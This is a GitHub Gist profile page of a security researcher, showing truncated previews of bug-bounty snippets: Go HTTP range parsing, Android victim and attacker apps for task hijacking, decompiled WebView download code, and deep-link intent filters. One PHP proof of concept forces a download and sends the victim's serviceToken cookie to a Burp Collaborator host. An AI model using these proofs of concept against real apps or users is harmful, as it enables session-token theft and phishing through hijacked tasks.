Skip to content

Instantly share code, notes, and snippets.

View t4kemyh4nd's full-sized avatar

candy maker t4kemyh4nd

75 followers · 7 following
View GitHub Profile
@t4kemyh4nd
t4kemyh4nd / parse.go
Last active July 29, 2020 06:00
type httpRange struct {
start, length int64
}
func parseRange(s string, size int64) ([]httpRange, error) {
//redacted
var ranges []httpRange
//redacted
var r httpRange
@t4kemyh4nd
t4kemyh4nd / fs.go
Last active August 1, 2020 03:33
if size >= 0 {
ranges, err := parseRange(rangeReq, size)
if err != nil {
if err == errNoOverlap {
w.Header().Set("Content-Range", fmt.Sprintf("bytes */%d", size))
}
Error(w, err.Error(), StatusRequestedRangeNotSatisfiable)
return
}
if sumRangesSize(ranges) > size {
@t4kemyh4nd
t4kemyh4nd / MainActivity.java
Created February 20, 2021 15:06
package com.tmh.victim;
import androidx.appcompat.app.AppCompatActivity;
import android.os.Bundle;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
@t4kemyh4nd
t4kemyh4nd / AndroidManifest.xml
Created February 20, 2021 15:08
<activity android:name=".MainActivity" android:launchMode="singleTask">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
@t4kemyh4nd
t4kemyh4nd / AndroidManifest.xml
Last active February 22, 2021 08:12
Attacker's app for task hijacking
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.tmh.attacker">
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
android:supportsRtl="true"
@t4kemyh4nd
t4kemyh4nd / webview.java
Created July 19, 2021 14:24
this.webView.setDownloadListener(new DownloadListener() {
public final void onDownloadStart(String str, String str2, String str3, String str4, long j) {
String str5;
if (!bhr.O000000o(WebActivity.this.getApplicationContext(), "android.permission.WRITE_EXTERNAL_STORAGE")) {
bhh.O000000o(WebActivity.this.getApplicationContext(), (int) R.string.storage_permission_error, 1);
return;
}
WebActivity.this.addDownloadListener();
Context applicationContext = WebActivity.this.getApplicationContext();
@t4kemyh4nd
t4kemyh4nd / poc.php
Created July 19, 2021 14:29
<?php
header('Content-Type: application/pdf');
header("Content-disposition: attachment; filename=\"" . "ameya.html" . "\"");
file_get_contents("http://pvo1ztne9qj33kvlf4edizlhs8yymn.burpcollaborator.net/?exfil=".$_COOKIE["serviceToken"]);
echo "downloaded";
?>
@t4kemyh4nd
t4kemyh4nd / manifest.xml
Created July 19, 2021 14:57
<intent-filter>
<action android:name="android.intent.action.VIEW"/>
<category android:name="android.intent.category.DEFAULT"/>
<category android:name="android.intent.category.BROWSABLE"/>
<!---redacted--->
<data android:scheme="miui-music" android:host="web"/>
<!---redacted--->
</intent-filter>
@t4kemyh4nd
t4kemyh4nd / HybridUriParser.java
Created July 19, 2021 14:59
public static Intent parseActivity(Context context, Uri uri) {
if (uri == null || !FeatureConstants.SCHEME.equals(uri.getScheme())) {
return null;
}
String authority = uri.getAuthority();
IDeviceCompat deviceCompat = IApplicationHelper.CC.getInstance().getDeviceCompat();
if ("settings".equals(authority)) {
Intent intent = new Intent(context, deviceCompat.getActivityClass(1));
intent.setData(uri);
intent.setPackage(context.getPackageName());
@t4kemyh4nd
t4kemyh4nd / task-decep.xml
Created August 27, 2021 05:17
<intent-filter android:autoVerify="true">
<action android:name="android.intent.action.VIEW" />
<category android:name="android.intent.category.DEFAULT" />
<category android:name="android.intent.category.BROWSABLE" />
<data
android:path="/deceive.html"
android:host="recon.takemyhand.xyz"
android:scheme="https" />
</intent-filter>